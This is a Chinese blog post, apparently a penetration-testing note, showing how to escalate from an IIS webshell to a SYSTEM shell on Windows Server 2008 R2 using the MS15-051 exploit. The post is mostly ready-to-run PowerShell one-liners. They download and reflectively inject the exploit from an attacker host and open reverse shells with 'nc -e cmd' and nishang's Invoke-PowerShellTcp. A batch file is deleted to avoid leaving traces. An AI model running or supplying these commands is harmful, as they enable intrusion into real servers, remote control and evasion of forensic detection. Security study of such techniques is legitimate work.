powershell远程加载ms15-051exp对win2008 R2提权

热度:506℃ 评论:2 发布时间:2018-07-22 收录:已收录

环境:win2008R2一台
外网服务器一台
场景:已经得到win2008R2的webshell,权限的iis,目标是得到system权限的交互式shell。

方法1:上传nc到win2008R2

ms15-051在内存提权

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://外网IP:8011/ms15-051.exe -ExeArgs '\"nc -e cmd 外网IP 8443\"' -ForceASLR

powershell远程加载ms15-051exp对win2008 R2提权

方法2:

将反弹Powershell的命令写在1.bat,为了不留下文件,所以del 1.bat,但感觉还不够优雅。
反弹Powershell的命令(1.bat)

del 1.bat && powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 外网IP -port 8443

然后在提权的时候执行1.bat

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://外网IP:8011/ms15-051.exe -ExeArgs '\"1.bat\"' -ForceASLR

powershell远程加载ms15-051exp对win2008 R2提权
有人可能会问直接执行反弹shell的命令行不行,因为命令中存在单引号,所以暂时是写在bat里,避免报错。但记得可以执行Empire中经过base64编码的命令,可以避免单引号这个问题,还未实践成功。

参考链接:

60字节 - 无文件渗透测试实验
一篇文章精通PowerShell Empire 2.3(上)

打赏
本文由 Mr.Wu 创作,除注明转载/出处外,均为本站原创,转载前请注明出处!

2条回应:“powershell远程加载ms15-051exp对win2008 R2提权”

  1. noname说道:

    我想问这样是因为杀软不拦截嘛????

发表评论

电子邮件地址不会被公开。 必填项已用*标注

顶部
护眼
搜索
分享